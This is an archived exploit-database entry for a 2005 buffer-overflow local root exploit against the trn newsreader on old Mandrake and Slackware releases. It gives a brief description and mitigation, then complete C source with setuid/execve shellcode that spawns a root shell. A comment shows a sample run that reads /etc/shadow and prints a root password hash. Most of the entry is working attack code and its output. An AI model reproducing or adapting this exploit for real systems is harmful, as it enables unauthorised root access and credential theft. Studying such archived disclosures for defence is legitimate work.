/usr/bin/trn local root exploit

vendor:

/usr/bin/trn

by:

ZzagorR

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: /usr/bin/trn

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2005

/usr/bin/trn local root exploit

This exploit targets the /usr/bin/trn binary and allows an attacker to gain root privileges. By providing a specially crafted 'buf' argument, the attacker can overwrite the return address and execute arbitrary code. The exploit includes a shellcode that spawns a root shell. This vulnerability affects versions of trn on Mandrake 9.2, Slackware 10.0.0, and Slackware 9.1.0.

Mitigation:

This vulnerability can be mitigated by applying the appropriate patch or update for the trn binary. Alternatively, users can remove the trn binary if it is not needed.

Source

Exploit-DB raw data:

/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
 sh-2.05b$ ./trn
  usage   : ./trn ret buf
  example : ./trn 0xbfffff64
  [+] mandrake   9.2  = 0xbfffff96
  [+] slackware 10.0.0= 0xbfffff98
  [+] slackware  9.1.0= 0xbfffff84
 sh-2.05b$
 sh-2.05b$ ./trn 0xbfffff84 128
  [BOO  %] 128
  [RET  %] bfffff84
 sh-2.05b#
 sh-2.05b# id
  uid=0(root) gid=98(nobody) groups=98(nobody)
 sh-2.05b# cat /etc/shadow
  root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
 MANDRAKE 9.2
 SLACKWARE 10.0.0
 SLACKWARE 9.1.0
 http://www.rootbinbash.com/d0kum4n/trn-test.txt
BOO:
 $trn `perl -e 'print "A" x 120'`
 $trn `perl -e 'print "A" x 124'`
 $trn `perl -e 'print "A" x 128'`
  Segmentation fault
BOO=128
*/

#include <stdio.h>
#include <string.h>
#define NEREDE "/usr/bin/trn"

char caylarbeles[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char *argv[]){
 int bizim;
 char bufe[1000];
 char *tayfasi;
 if (argc < 3) {
  printf ("{           trn l0c4l r00t 3xpl01t          }\n");
  printf ("{  By ZzagorR - http://www.rootbinbash.com  }\n");
  printf ("{  usage   : %s ret buf                  }\n",argv[0]);
  printf ("{  example : %s 0xbfffff99 142           }\n",argv[0]);
  printf ("{  mandrake   9.2   = 0xbfffff96            }\n");
  printf ("{  slackware 10.0.0 = 0xbfffff98            }\n");
  printf ("{  slackware  9.1.0 = 0xbfffff84            }\n");
  exit(1);
 }else{
  unsigned long RET=strtoul(argv[1], NULL, 16);
  int BOO = atoi(argv[2]);
   printf ("[BOO  %] %i\n",BOO);
   printf ("[RET  %] %x\n",RET);
  tayfasi = bufe;
  memset(bufe, 0x41,256-strlen(caylarbeles));
  sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
  for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
   *(long*)(tayfasi+bizim) = RET;
  execl(NEREDE, NEREDE , bufe, NULL);
 }
}

// milw0rm.com [2005-01-26]